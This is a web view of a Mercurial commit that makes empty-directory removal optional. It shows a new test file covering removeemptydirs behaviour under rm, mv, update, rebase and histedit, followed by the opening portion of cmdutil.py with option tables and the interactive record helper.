##// END OF EJS Templates
unlinkpath: make empty directory removal optional (issue5901) (issue5826)...
Kyle Lippincott -
r38512:da2a7d83 @60 default
parent child Browse files
Show More
@@ -0,0 +1,242 b''
1 Tests for experimental.removeemptydirs
2
3 $ NO_RM=--config=experimental.removeemptydirs=0
4 $ isdir() { if [ -d $1 ]; then echo yes; else echo no; fi }
5 $ isfile() { if [ -f $1 ]; then echo yes; else echo no; fi }
6
7 `hg rm` of the last file in a directory:
8 $ hg init hgrm
9 $ cd hgrm
10 $ mkdir somedir
11 $ echo hi > somedir/foo
12 $ hg ci -qAm foo
13 $ isdir somedir
14 yes
15 $ hg rm somedir/foo
16 $ isdir somedir
17 no
18 $ hg revert -qa
19 $ isdir somedir
20 yes
21 $ hg $NO_RM rm somedir/foo
22 $ isdir somedir
23 yes
24 $ ls somedir
25 $ cd $TESTTMP
26
27 `hg mv` of the last file in a directory:
28 $ hg init hgmv
29 $ cd hgmv
30 $ mkdir somedir
31 $ mkdir destdir
32 $ echo hi > somedir/foo
33 $ hg ci -qAm foo
34 $ isdir somedir
35 yes
36 $ hg mv somedir/foo destdir/foo
37 $ isdir somedir
38 no
39 $ hg revert -qa
40 (revert doesn't get rid of destdir/foo?)
41 $ rm destdir/foo
42 $ isdir somedir
43 yes
44 $ hg $NO_RM mv somedir/foo destdir/foo
45 $ isdir somedir
46 yes
47 $ ls somedir
48 $ cd $TESTTMP
49
50 Updating to a commit that doesn't have the directory:
51 $ hg init hgupdate
52 $ cd hgupdate
53 $ echo hi > r0
54 $ hg ci -qAm r0
55 $ mkdir somedir
56 $ echo hi > somedir/foo
57 $ hg ci -qAm r1
58 $ isdir somedir
59 yes
60 $ hg co -q -r ".^"
61 $ isdir somedir
62 no
63 $ hg co -q tip
64 $ isdir somedir
65 yes
66 $ hg $NO_RM co -q -r ".^"
67 $ isdir somedir
68 yes
69 $ ls somedir
70 $ cd $TESTTMP
71
72 Rebasing across a commit that doesn't have the directory, from inside the
73 directory:
74 $ hg init hgrebase
75 $ cd hgrebase
76 $ echo hi > r0
77 $ hg ci -qAm r0
78 $ mkdir somedir
79 $ echo hi > somedir/foo
80 $ hg ci -qAm first_rebase_source
81 $ hg $NO_RM co -q -r ".^"
82 $ echo hi > somedir/bar
83 $ hg ci -qAm first_rebase_dest
84 $ hg $NO_RM co -q -r ".^"
85 $ echo hi > somedir/baz
86 $ hg ci -qAm second_rebase_dest
87 $ hg co -qr 'desc(first_rebase_source)'
88 $ cd $TESTTMP/hgrebase/somedir
89 $ hg --config extensions.rebase= rebase -qr . -d 'desc(first_rebase_dest)'
90 current directory was removed
91 (consider changing to repo root: $TESTTMP/hgrebase)
92 $ cd $TESTTMP/hgrebase/somedir
93 (The current node is the rebased first_rebase_source on top of
94 first_rebase_dest)
95 This should not output anything about current directory being removed:
96 $ hg $NO_RM --config extensions.rebase= rebase -qr . -d 'desc(second_rebase_dest)'
97 $ cd $TESTTMP
98
99 Histediting across a commit that doesn't have the directory, from inside the
100 directory (reordering nodes):
101 $ hg init hghistedit
102 $ cd hghistedit
103 $ echo hi > r0
104 $ hg ci -qAm r0
105 $ echo hi > r1
106 $ hg ci -qAm r1
107 $ echo hi > r2
108 $ hg ci -qAm r2
109 $ mkdir somedir
110 $ echo hi > somedir/foo
111 $ hg ci -qAm migrating_revision
112 $ cat > histedit_commands <<EOF
113 > pick 89079fab8aee 0 r0
114 > pick e6d271df3142 1 r1
115 > pick 89e25aa83f0f 3 migrating_revision
116 > pick b550aa12d873 2 r2
117 > EOF
118 $ cd $TESTTMP/hghistedit/somedir
119 $ hg --config extensions.histedit= histedit -q --commands ../histedit_commands
120
121 histedit doesn't output anything when the current diretory is removed. We rely
122 on the tests being commonly run on machines where the current directory
123 disappearing from underneath us actually has an observable effect, such as an
124 error or no files listed
125 #if linuxormacos
126 $ isfile foo
127 no
128 #endif
129 $ cd $TESTTMP/hghistedit/somedir
130 $ isfile foo
131 yes
132
133 $ cd $TESTTMP/hghistedit
134 $ cat > histedit_commands <<EOF
135 > pick 89079fab8aee 0 r0
136 > pick 7c7a22c6009f 3 migrating_revision
137 > pick e6d271df3142 1 r1
138 > pick 40a53c2d4276 2 r2
139 > EOF
140 $ cd $TESTTMP/hghistedit/somedir
141 $ hg $NO_RM --config extensions.histedit= histedit -q --commands ../histedit_commands
142 Regardless of system, we should always get a 'yes' here.
143 $ isfile foo
144 yes
145 $ cd $TESTTMP
146
147 This is essentially the exact test from issue5826, just cleaned up a little:
148
149 $ hg init issue5826_withrm
150 $ cd issue5826_withrm
151
152 $ cat >> $HGRCPATH <<EOF
153 > [extensions]
154 > histedit =
155 > EOF
156 Commit three revisions that each create a directory:
157
158 $ mkdir foo
159 $ touch foo/bar
160 $ hg commit -qAm "add foo"
161
162 $ mkdir bar
163 $ touch bar/bar
164 $ hg commit -qAm "add bar"
165
166 $ mkdir baz
167 $ touch baz/bar
168 $ hg commit -qAm "add baz"
169
170 Enter the first directory:
171
172 $ cd foo
173
174 Histedit doing 'pick, pick, fold':
175
176 $ hg histedit --commands /dev/stdin <<EOF
177 > pick 6274c77c93c3 1 add bar
178 > pick ff70a87b588f 0 add foo
179 > fold 9992bb0ac0db 2 add baz
180 > EOF
181 abort: $ENOENT$
182 [255]
183
184 Go back to the repo root after losing it as part of that operation:
185 $ cd $TESTTMP/issue5826_withrm
186
187 Note the lack of a non-zero exit code from this function - it exits
188 successfully, but doesn't really do anything.
189 $ hg histedit --continue
190 9992bb0ac0db: cannot fold - working copy is not a descendant of previous commit 5c806432464a
191 saved backup bundle to $TESTTMP/issue5826_withrm/.hg/strip-backup/ff70a87b588f-e94f9789-histedit.hg
192
193 $ hg log -T '{rev}:{node|short} {desc}\n'
194 2:94e3f9fae1d6 fold-temp-revision 9992bb0ac0db
195 1:5c806432464a add foo
196 0:d17db4b0303a add bar
197
198 Now test that again with experimental.removeemptydirs=false:
199 $ hg init issue5826_norm
200 $ cd issue5826_norm
201
202 $ cat >> $HGRCPATH <<EOF
203 > [extensions]
204 > histedit =
205 > [experimental]
206 > removeemptydirs = false
207 > EOF
208 Commit three revisions that each create a directory:
209
210 $ mkdir foo
211 $ touch foo/bar
212 $ hg commit -qAm "add foo"
213
214 $ mkdir bar
215 $ touch bar/bar
216 $ hg commit -qAm "add bar"
217
218 $ mkdir baz
219 $ touch baz/bar
220 $ hg commit -qAm "add baz"
221
222 Enter the first directory:
223
224 $ cd foo
225
226 Histedit doing 'pick, pick, fold':
227
228 $ hg histedit --commands /dev/stdin <<EOF
229 > pick 6274c77c93c3 1 add bar
230 > pick ff70a87b588f 0 add foo
231 > fold 9992bb0ac0db 2 add baz
232 > EOF
233 saved backup bundle to $TESTTMP/issue5826_withrm/issue5826_norm/.hg/strip-backup/5c806432464a-cd4c8d86-histedit.hg
234
235 Note the lack of a 'cd' being necessary here, and we don't need to 'histedit
236 --continue'
237
238 $ hg log -T '{rev}:{node|short} {desc}\n'
239 1:b9eddaa97cbc add foo
240 ***
241 add baz
242 0:d17db4b0303a add bar
@@ -1,3259 +1,3263 b''
1 # cmdutil.py - help for command processing in mercurial
1 # cmdutil.py - help for command processing in mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import os
11 import os
12 import re
12 import re
13
13
14 from .i18n import _
14 from .i18n import _
15 from .node import (
15 from .node import (
16 hex,
16 hex,
17 nullid,
17 nullid,
18 nullrev,
18 nullrev,
19 short,
19 short,
20 )
20 )
21
21
22 from . import (
22 from . import (
23 bookmarks,
23 bookmarks,
24 changelog,
24 changelog,
25 copies,
25 copies,
26 crecord as crecordmod,
26 crecord as crecordmod,
27 dirstateguard,
27 dirstateguard,
28 encoding,
28 encoding,
29 error,
29 error,
30 formatter,
30 formatter,
31 logcmdutil,
31 logcmdutil,
32 match as matchmod,
32 match as matchmod,
33 merge as mergemod,
33 merge as mergemod,
34 mergeutil,
34 mergeutil,
35 obsolete,
35 obsolete,
36 patch,
36 patch,
37 pathutil,
37 pathutil,
38 phases,
38 phases,
39 pycompat,
39 pycompat,
40 revlog,
40 revlog,
41 rewriteutil,
41 rewriteutil,
42 scmutil,
42 scmutil,
43 smartset,
43 smartset,
44 subrepoutil,
44 subrepoutil,
45 templatekw,
45 templatekw,
46 templater,
46 templater,
47 util,
47 util,
48 vfs as vfsmod,
48 vfs as vfsmod,
49 )
49 )
50
50
51 from .utils import (
51 from .utils import (
52 dateutil,
52 dateutil,
53 stringutil,
53 stringutil,
54 )
54 )
55
55
56 stringio = util.stringio
56 stringio = util.stringio
57
57
58 # templates of common command options
58 # templates of common command options
59
59
60 dryrunopts = [
60 dryrunopts = [
61 ('n', 'dry-run', None,
61 ('n', 'dry-run', None,
62 _('do not perform actions, just print output')),
62 _('do not perform actions, just print output')),
63 ]
63 ]
64
64
65 remoteopts = [
65 remoteopts = [
66 ('e', 'ssh', '',
66 ('e', 'ssh', '',
67 _('specify ssh command to use'), _('CMD')),
67 _('specify ssh command to use'), _('CMD')),
68 ('', 'remotecmd', '',
68 ('', 'remotecmd', '',
69 _('specify hg command to run on the remote side'), _('CMD')),
69 _('specify hg command to run on the remote side'), _('CMD')),
70 ('', 'insecure', None,
70 ('', 'insecure', None,
71 _('do not verify server certificate (ignoring web.cacerts config)')),
71 _('do not verify server certificate (ignoring web.cacerts config)')),
72 ]
72 ]
73
73
74 walkopts = [
74 walkopts = [
75 ('I', 'include', [],
75 ('I', 'include', [],
76 _('include names matching the given patterns'), _('PATTERN')),
76 _('include names matching the given patterns'), _('PATTERN')),
77 ('X', 'exclude', [],
77 ('X', 'exclude', [],
78 _('exclude names matching the given patterns'), _('PATTERN')),
78 _('exclude names matching the given patterns'), _('PATTERN')),
79 ]
79 ]
80
80
81 commitopts = [
81 commitopts = [
82 ('m', 'message', '',
82 ('m', 'message', '',
83 _('use text as commit message'), _('TEXT')),
83 _('use text as commit message'), _('TEXT')),
84 ('l', 'logfile', '',
84 ('l', 'logfile', '',
85 _('read commit message from file'), _('FILE')),
85 _('read commit message from file'), _('FILE')),
86 ]
86 ]
87
87
88 commitopts2 = [
88 commitopts2 = [
89 ('d', 'date', '',
89 ('d', 'date', '',
90 _('record the specified date as commit date'), _('DATE')),
90 _('record the specified date as commit date'), _('DATE')),
91 ('u', 'user', '',
91 ('u', 'user', '',
92 _('record the specified user as committer'), _('USER')),
92 _('record the specified user as committer'), _('USER')),
93 ]
93 ]
94
94
95 # hidden for now
95 # hidden for now
96 formatteropts = [
96 formatteropts = [
97 ('T', 'template', '',
97 ('T', 'template', '',
98 _('display with template (EXPERIMENTAL)'), _('TEMPLATE')),
98 _('display with template (EXPERIMENTAL)'), _('TEMPLATE')),
99 ]
99 ]
100
100
101 templateopts = [
101 templateopts = [
102 ('', 'style', '',
102 ('', 'style', '',
103 _('display using template map file (DEPRECATED)'), _('STYLE')),
103 _('display using template map file (DEPRECATED)'), _('STYLE')),
104 ('T', 'template', '',
104 ('T', 'template', '',
105 _('display with template'), _('TEMPLATE')),
105 _('display with template'), _('TEMPLATE')),
106 ]
106 ]
107
107
108 logopts = [
108 logopts = [
109 ('p', 'patch', None, _('show patch')),
109 ('p', 'patch', None, _('show patch')),
110 ('g', 'git', None, _('use git extended diff format')),
110 ('g', 'git', None, _('use git extended diff format')),
111 ('l', 'limit', '',
111 ('l', 'limit', '',
112 _('limit number of changes displayed'), _('NUM')),
112 _('limit number of changes displayed'), _('NUM')),
113 ('M', 'no-merges', None, _('do not show merges')),
113 ('M', 'no-merges', None, _('do not show merges')),
114 ('', 'stat', None, _('output diffstat-style summary of changes')),
114 ('', 'stat', None, _('output diffstat-style summary of changes')),
115 ('G', 'graph', None, _("show the revision DAG")),
115 ('G', 'graph', None, _("show the revision DAG")),
116 ] + templateopts
116 ] + templateopts
117
117
118 diffopts = [
118 diffopts = [
119 ('a', 'text', None, _('treat all files as text')),
119 ('a', 'text', None, _('treat all files as text')),
120 ('g', 'git', None, _('use git extended diff format')),
120 ('g', 'git', None, _('use git extended diff format')),
121 ('', 'binary', None, _('generate binary diffs in git mode (default)')),
121 ('', 'binary', None, _('generate binary diffs in git mode (default)')),
122 ('', 'nodates', None, _('omit dates from diff headers'))
122 ('', 'nodates', None, _('omit dates from diff headers'))
123 ]
123 ]
124
124
125 diffwsopts = [
125 diffwsopts = [
126 ('w', 'ignore-all-space', None,
126 ('w', 'ignore-all-space', None,
127 _('ignore white space when comparing lines')),
127 _('ignore white space when comparing lines')),
128 ('b', 'ignore-space-change', None,
128 ('b', 'ignore-space-change', None,
129 _('ignore changes in the amount of white space')),
129 _('ignore changes in the amount of white space')),
130 ('B', 'ignore-blank-lines', None,
130 ('B', 'ignore-blank-lines', None,
131 _('ignore changes whose lines are all blank')),
131 _('ignore changes whose lines are all blank')),
132 ('Z', 'ignore-space-at-eol', None,
132 ('Z', 'ignore-space-at-eol', None,
133 _('ignore changes in whitespace at EOL')),
133 _('ignore changes in whitespace at EOL')),
134 ]
134 ]
135
135
136 diffopts2 = [
136 diffopts2 = [
137 ('', 'noprefix', None, _('omit a/ and b/ prefixes from filenames')),
137 ('', 'noprefix', None, _('omit a/ and b/ prefixes from filenames')),
138 ('p', 'show-function', None, _('show which function each change is in')),
138 ('p', 'show-function', None, _('show which function each change is in')),
139 ('', 'reverse', None, _('produce a diff that undoes the changes')),
139 ('', 'reverse', None, _('produce a diff that undoes the changes')),
140 ] + diffwsopts + [
140 ] + diffwsopts + [
141 ('U', 'unified', '',
141 ('U', 'unified', '',
142 _('number of lines of context to show'), _('NUM')),
142 _('number of lines of context to show'), _('NUM')),
143 ('', 'stat', None, _('output diffstat-style summary of changes')),
143 ('', 'stat', None, _('output diffstat-style summary of changes')),
144 ('', 'root', '', _('produce diffs relative to subdirectory'), _('DIR')),
144 ('', 'root', '', _('produce diffs relative to subdirectory'), _('DIR')),
145 ]
145 ]
146
146
147 mergetoolopts = [
147 mergetoolopts = [
148 ('t', 'tool', '', _('specify merge tool')),
148 ('t', 'tool', '', _('specify merge tool')),
149 ]
149 ]
150
150
151 similarityopts = [
151 similarityopts = [
152 ('s', 'similarity', '',
152 ('s', 'similarity', '',
153 _('guess renamed files by similarity (0<=s<=100)'), _('SIMILARITY'))
153 _('guess renamed files by similarity (0<=s<=100)'), _('SIMILARITY'))
154 ]
154 ]
155
155
156 subrepoopts = [
156 subrepoopts = [
157 ('S', 'subrepos', None,
157 ('S', 'subrepos', None,
158 _('recurse into subrepositories'))
158 _('recurse into subrepositories'))
159 ]
159 ]
160
160
161 debugrevlogopts = [
161 debugrevlogopts = [
162 ('c', 'changelog', False, _('open changelog')),
162 ('c', 'changelog', False, _('open changelog')),
163 ('m', 'manifest', False, _('open manifest')),
163 ('m', 'manifest', False, _('open manifest')),
164 ('', 'dir', '', _('open directory manifest')),
164 ('', 'dir', '', _('open directory manifest')),
165 ]
165 ]
166
166
167 # special string such that everything below this line will be ingored in the
167 # special string such that everything below this line will be ingored in the
168 # editor text
168 # editor text
169 _linebelow = "^HG: ------------------------ >8 ------------------------$"
169 _linebelow = "^HG: ------------------------ >8 ------------------------$"
170
170
171 def ishunk(x):
171 def ishunk(x):
172 hunkclasses = (crecordmod.uihunk, patch.recordhunk)
172 hunkclasses = (crecordmod.uihunk, patch.recordhunk)
173 return isinstance(x, hunkclasses)
173 return isinstance(x, hunkclasses)
174
174
175 def newandmodified(chunks, originalchunks):
175 def newandmodified(chunks, originalchunks):
176 newlyaddedandmodifiedfiles = set()
176 newlyaddedandmodifiedfiles = set()
177 for chunk in chunks:
177 for chunk in chunks:
178 if ishunk(chunk) and chunk.header.isnewfile() and chunk not in \
178 if ishunk(chunk) and chunk.header.isnewfile() and chunk not in \
179 originalchunks:
179 originalchunks:
180 newlyaddedandmodifiedfiles.add(chunk.header.filename())
180 newlyaddedandmodifiedfiles.add(chunk.header.filename())
181 return newlyaddedandmodifiedfiles
181 return newlyaddedandmodifiedfiles
182
182
183 def parsealiases(cmd):
183 def parsealiases(cmd):
184 return cmd.lstrip("^").split("|")
184 return cmd.lstrip("^").split("|")
185
185
186 def setupwrapcolorwrite(ui):
186 def setupwrapcolorwrite(ui):
187 # wrap ui.write so diff output can be labeled/colorized
187 # wrap ui.write so diff output can be labeled/colorized
188 def wrapwrite(orig, *args, **kw):
188 def wrapwrite(orig, *args, **kw):
189 label = kw.pop(r'label', '')
189 label = kw.pop(r'label', '')
190 for chunk, l in patch.difflabel(lambda: args):
190 for chunk, l in patch.difflabel(lambda: args):
191 orig(chunk, label=label + l)
191 orig(chunk, label=label + l)
192
192
193 oldwrite = ui.write
193 oldwrite = ui.write
194 def wrap(*args, **kwargs):
194 def wrap(*args, **kwargs):
195 return wrapwrite(oldwrite, *args, **kwargs)
195 return wrapwrite(oldwrite, *args, **kwargs)
196 setattr(ui, 'write', wrap)
196 setattr(ui, 'write', wrap)
197 return oldwrite
197 return oldwrite
198
198
199 def filterchunks(ui, originalhunks, usecurses, testfile, operation=None):
199 def filterchunks(ui, originalhunks, usecurses, testfile, operation=None):
200 try:
200 try:
201 if usecurses:
201 if usecurses:
202 if testfile:
202 if testfile:
203 recordfn = crecordmod.testdecorator(
203 recordfn = crecordmod.testdecorator(
204 testfile, crecordmod.testchunkselector)
204 testfile, crecordmod.testchunkselector)
205 else:
205 else:
206 recordfn = crecordmod.chunkselector
206 recordfn = crecordmod.chunkselector
207
207
208 return crecordmod.filterpatch(ui, originalhunks, recordfn,
208 return crecordmod.filterpatch(ui, originalhunks, recordfn,
209 operation)
209 operation)
210 except crecordmod.fallbackerror as e:
210 except crecordmod.fallbackerror as e:
211 ui.warn('%s\n' % e.message)
211 ui.warn('%s\n' % e.message)
212 ui.warn(_('falling back to text mode\n'))
212 ui.warn(_('falling back to text mode\n'))
213
213
214 return patch.filterpatch(ui, originalhunks, operation)
214 return patch.filterpatch(ui, originalhunks, operation)
215
215
216 def recordfilter(ui, originalhunks, operation=None):
216 def recordfilter(ui, originalhunks, operation=None):
217 """ Prompts the user to filter the originalhunks and return a list of
217 """ Prompts the user to filter the originalhunks and return a list of
218 selected hunks.
218 selected hunks.
219 *operation* is used for to build ui messages to indicate the user what
219 *operation* is used for to build ui messages to indicate the user what
220 kind of filtering they are doing: reverting, committing, shelving, etc.
220 kind of filtering they are doing: reverting, committing, shelving, etc.
221 (see patch.filterpatch).
221 (see patch.filterpatch).
222 """
222 """
223 usecurses = crecordmod.checkcurses(ui)
223 usecurses = crecordmod.checkcurses(ui)
224 testfile = ui.config('experimental', 'crecordtest')
224 testfile = ui.config('experimental', 'crecordtest')
225 oldwrite = setupwrapcolorwrite(ui)
225 oldwrite = setupwrapcolorwrite(ui)
226 try:
226 try:
227 newchunks, newopts = filterchunks(ui, originalhunks, usecurses,
227 newchunks, newopts = filterchunks(ui, originalhunks, usecurses,
228 testfile, operation)
228 testfile, operation)
229 finally:
229 finally:
230 ui.write = oldwrite
230 ui.write = oldwrite
231 return newchunks, newopts
231 return newchunks, newopts
232
232
233 def dorecord(ui, repo, commitfunc, cmdsuggest, backupall,
233 def dorecord(ui, repo, commitfunc, cmdsuggest, backupall,
234 filterfn, *pats, **opts):
234 filterfn, *pats, **opts):
235 opts = pycompat.byteskwargs(opts)
235 opts = pycompat.byteskwargs(opts)
236 if not ui.interactive():
236 if not ui.interactive():
237 if cmdsuggest:
237 if cmdsuggest:
238 msg = _('running non-interactively, use %s instead') % cmdsuggest
238 msg = _('running non-interactively, use %s instead') % cmdsuggest
239 else:
239 else:
240 msg = _('running non-interactively')
240 msg = _('running non-interactively')
241 raise error.Abort(msg)
241 raise error.Abort(msg)
242
242
243 # make sure username is set before going interactive
243 # make sure username is set before going interactive
244 if not opts.get('user'):
244 if not opts.get('user'):
245 ui.username() # raise exception, username not provided
245 ui.username() # raise exception, username not provided
246
246
247 def recordfunc(ui, repo, message, match, opts):
247 def recordfunc(ui, repo, message, match, opts):
248 """This is generic record driver.
248 """This is generic record driver.
249
249
250 Its job is to interactively filter local changes, and
250 Its job is to interactively filter local changes, and
251 accordingly prepare working directory into a state in which the
251 accordingly prepare working directory into a state in which the
252 job can be delegated to a non-interactive commit command such as
252 job can be delegated to a non-interactive commit command such as
253 'commit' or 'qrefresh'.
253 'commit' or 'qrefresh'.
254
254
255 After the actual job is done by non-interactive command, the
255 After the actual job is done by non-interactive command, the
256 working directory is restored to its original state.
256 working directory is restored to its original state.
257
257
258 In the end we'll record interesting changes, and everything else
258 In the end we'll record interesting changes, and everything else
259 will be left in place, so the user can continue working.
259 will be left in place, so the user can continue working.
260 """
260 """
261
261
262 checkunfinished(repo, commit=True)
262 checkunfinished(repo, commit=True)
263 wctx = repo[None]
263 wctx = repo[None]
264 merge = len(wctx.parents()) > 1
264 merge = len(wctx.parents()) > 1
265 if merge:
265 if merge:
266 raise error.Abort(_('cannot partially commit a merge '
266 raise error.Abort(_('cannot partially commit a merge '
267 '(use "hg commit" instead)'))
267 '(use "hg commit" instead)'))
268
268
269 def fail(f, msg):
269 def fail(f, msg):
270 raise error.Abort('%s: %s' % (f, msg))
270 raise error.Abort('%s: %s' % (f, msg))
271
271
272 force = opts.get('force')
272 force = opts.get('force')
273 if not force:
273 if not force:
274 vdirs = []
274 vdirs = []
275 match.explicitdir = vdirs.append
275 match.explicitdir = vdirs.append
276 match.bad = fail
276 match.bad = fail
277
277
278 status = repo.status(match=match)
278 status = repo.status(match=match)
279 if not force:
279 if not force:
280 repo.checkcommitpatterns(wctx, vdirs, match, status, fail)
280 repo.checkcommitpatterns(wctx, vdirs, match, status, fail)
281 diffopts = patch.difffeatureopts(ui, opts=opts, whitespace=True)
281 diffopts = patch.difffeatureopts(ui, opts=opts, whitespace=True)
282 diffopts.nodates = True
282 diffopts.nodates = True
283 diffopts.git = True
283 diffopts.git = True
284 diffopts.showfunc = True
284 diffopts.showfunc = True
285 originaldiff = patch.diff(repo, changes=status, opts=diffopts)
285 originaldiff = patch.diff(repo, changes=status, opts=diffopts)
286 originalchunks = patch.parsepatch(originaldiff)
286 originalchunks = patch.parsepatch(originaldiff)
287
287
288 # 1. filter patch, since we are intending to apply subset of it
288 # 1. filter patch, since we are intending to apply subset of it
289 try:
289 try:
290 chunks, newopts = filterfn(ui, originalchunks)
290 chunks, newopts = filterfn(ui, originalchunks)
291 except error.PatchError as err:
291 except error.PatchError as err:
292 raise error.Abort(_('error parsing patch: %s') % err)
292 raise error.Abort(_('error parsing patch: %s') % err)
293 opts.update(newopts)
293 opts.update(newopts)
294
294
295 # We need to keep a backup of files that have been newly added and
295 # We need to keep a backup of files that have been newly added and
296 # modified during the recording process because there is a previous
296 # modified during the recording process because there is a previous
297 # version without the edit in the workdir
297 # version without the edit in the workdir
298 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
298 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
299 contenders = set()
299 contenders = set()
300 for h in chunks:
300 for h in chunks:
301 try:
301 try:
302 contenders.update(set(h.files()))
302 contenders.update(set(h.files()))
303 except AttributeError:
303 except AttributeError:
304 pass
304 pass
305
305
306 changed = status.modified + status.added + status.removed
306 changed = status.modified + status.added + status.removed
307 newfiles = [f for f in changed if f in contenders]
307 newfiles = [f for f in changed if f in contenders]
308 if not newfiles:
308 if not newfiles:
309 ui.status(_('no changes to record\n'))
309 ui.status(_('no changes to record\n'))
310 return 0
310 return 0
311
311
312 modified = set(status.modified)
312 modified = set(status.modified)
313
313
314 # 2. backup changed files, so we can restore them in the end
314 # 2. backup changed files, so we can restore them in the end
315
315
316 if backupall:
316 if backupall:
317 tobackup = changed
317 tobackup = changed
318 else:
318 else:
319 tobackup = [f for f in newfiles if f in modified or f in \
319 tobackup = [f for f in newfiles if f in modified or f in \
320 newlyaddedandmodifiedfiles]
320 newlyaddedandmodifiedfiles]
321 backups = {}
321 backups = {}
322 if tobackup:
322 if tobackup:
323 backupdir = repo.vfs.join('record-backups')
323 backupdir = repo.vfs.join('record-backups')
324 try:
324 try:
325 os.mkdir(backupdir)
325 os.mkdir(backupdir)
326 except OSError as err:
326 except OSError as err:
327 if err.errno != errno.EEXIST:
327 if err.errno != errno.EEXIST:
328 raise
328 raise
329 try:
329 try:
330 # backup continues
330 # backup continues
331 for f in tobackup:
331 for f in tobackup:
332 fd, tmpname = pycompat.mkstemp(prefix=f.replace('/', '_') + '.',
332 fd, tmpname = pycompat.mkstemp(prefix=f.replace('/', '_') + '.',
333 dir=backupdir)
333 dir=backupdir)
334 os.close(fd)
334 os.close(fd)
335 ui.debug('backup %r as %r\n' % (f, tmpname))
335 ui.debug('backup %r as %r\n' % (f, tmpname))
336 util.copyfile(repo.wjoin(f), tmpname, copystat=True)
336 util.copyfile(repo.wjoin(f), tmpname, copystat=True)
337 backups[f] = tmpname
337 backups[f] = tmpname
338
338
339 fp = stringio()
339 fp = stringio()
340 for c in chunks:
340 for c in chunks:
341 fname = c.filename()
341 fname = c.filename()
342 if fname in backups:
342 if fname in backups:
343 c.write(fp)
343 c.write(fp)
344 dopatch = fp.tell()
344 dopatch = fp.tell()
345 fp.seek(0)
345 fp.seek(0)
346
346
347 # 2.5 optionally review / modify patch in text editor
347 # 2.5 optionally review / modify patch in text editor
348 if opts.get('review', False):
348 if opts.get('review', False):
349 patchtext = (crecordmod.diffhelptext
349 patchtext = (crecordmod.diffhelptext
350 + crecordmod.patchhelptext
350 + crecordmod.patchhelptext
351 + fp.read())
351 + fp.read())
352 reviewedpatch = ui.edit(patchtext, "",
352 reviewedpatch = ui.edit(patchtext, "",
353 action="diff",
353 action="diff",
354 repopath=repo.path)
354 repopath=repo.path)
355 fp.truncate(0)
355 fp.truncate(0)
356 fp.write(reviewedpatch)
356 fp.write(reviewedpatch)
357 fp.seek(0)
357 fp.seek(0)
358
358
359 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
359 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
360 # 3a. apply filtered patch to clean repo (clean)
360 # 3a. apply filtered patch to clean repo (clean)
361 if backups:
361 if backups:
362 # Equivalent to hg.revert
362 # Equivalent to hg.revert
363 m = scmutil.matchfiles(repo, backups.keys())
363 m = scmutil.matchfiles(repo, backups.keys())
364 mergemod.update(repo, repo.dirstate.p1(),
364 mergemod.update(repo, repo.dirstate.p1(),
365 False, True, matcher=m)
365 False, True, matcher=m)
366
366
367 # 3b. (apply)
367 # 3b. (apply)
368 if dopatch:
368 if dopatch:
369 try:
369 try:
370 ui.debug('applying patch\n')
370 ui.debug('applying patch\n')
371 ui.debug(fp.getvalue())
371 ui.debug(fp.getvalue())
372 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
372 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
373 except error.PatchError as err:
373 except error.PatchError as err:
374 raise error.Abort(pycompat.bytestr(err))
374 raise error.Abort(pycompat.bytestr(err))
375 del fp
375 del fp
376
376
377 # 4. We prepared working directory according to filtered
377 # 4. We prepared working directory according to filtered
378 # patch. Now is the time to delegate the job to
378 # patch. Now is the time to delegate the job to
379 # commit/qrefresh or the like!
379 # commit/qrefresh or the like!
380
380
381 # Make all of the pathnames absolute.
381 # Make all of the pathnames absolute.
382 newfiles = [repo.wjoin(nf) for nf in newfiles]
382 newfiles = [repo.wjoin(nf) for nf in newfiles]
383 return commitfunc(ui, repo, *newfiles, **pycompat.strkwargs(opts))
383 return commitfunc(ui, repo, *newfiles, **pycompat.strkwargs(opts))
384 finally:
384 finally:
385 # 5. finally restore backed-up files
385 # 5. finally restore backed-up files
386 try:
386 try:
387 dirstate = repo.dirstate
387 dirstate = repo.dirstate
388 for realname, tmpname in backups.iteritems():
388 for realname, tmpname in backups.iteritems():
389 ui.debug('restoring %r to %r\n' % (tmpname, realname))
389 ui.debug('restoring %r to %r\n' % (tmpname, realname))
390
390
391 if dirstate[realname] == 'n':
391 if dirstate[realname] == 'n':
392 # without normallookup, restoring timestamp
392 # without normallookup, restoring timestamp
393 # may cause partially committed files
393 # may cause partially committed files
394 # to be treated as unmodified
394 # to be treated as unmodified
395 dirstate.normallookup(realname)
395 dirstate.normallookup(realname)
396
396
397 # copystat=True here and above are a hack to trick any
397 # copystat=True here and above are a hack to trick any
398 # editors that have f open that we haven't modified them.
398 # editors that have f open that we haven't modified them.
399 #
399 #
400 # Also note that this racy as an editor could notice the
400 # Also note that this racy as an editor could notice the
401 # file's mtime before we've finished writing it.
401 # file's mtime before we've finished writing it.
402 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
402 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
403 os.unlink(tmpname)
403 os.unlink(tmpname)
404 if tobackup:
404 if tobackup:
405 os.rmdir(backupdir)
405 os.rmdir(backupdir)
406 except OSError:
406 except OSError:
407 pass
407 pass
408
408
409 def recordinwlock(ui, repo, message, match, opts):
409 def recordinwlock(ui, repo, message, match, opts):
410 with repo.wlock():
410 with repo.wlock():
411 return recordfunc(ui, repo, message, match, opts)
411 return recordfunc(ui, repo, message, match, opts)
412
412
413 return commit(ui, repo, recordinwlock, pats, opts)
413 return commit(ui, repo, recordinwlock, pats, opts)
414
414
415 class dirnode(object):
415 class dirnode(object):
416 """
416 """
417 Represent a directory in user working copy with information required for
417 Represent a directory in user working copy with information required for
418 the purpose of tersing its status.
418 the purpose of tersing its status.
419
419
420 path is the path to the directory, without a trailing '/'
420 path is the path to the directory, without a trailing '/'
421
421
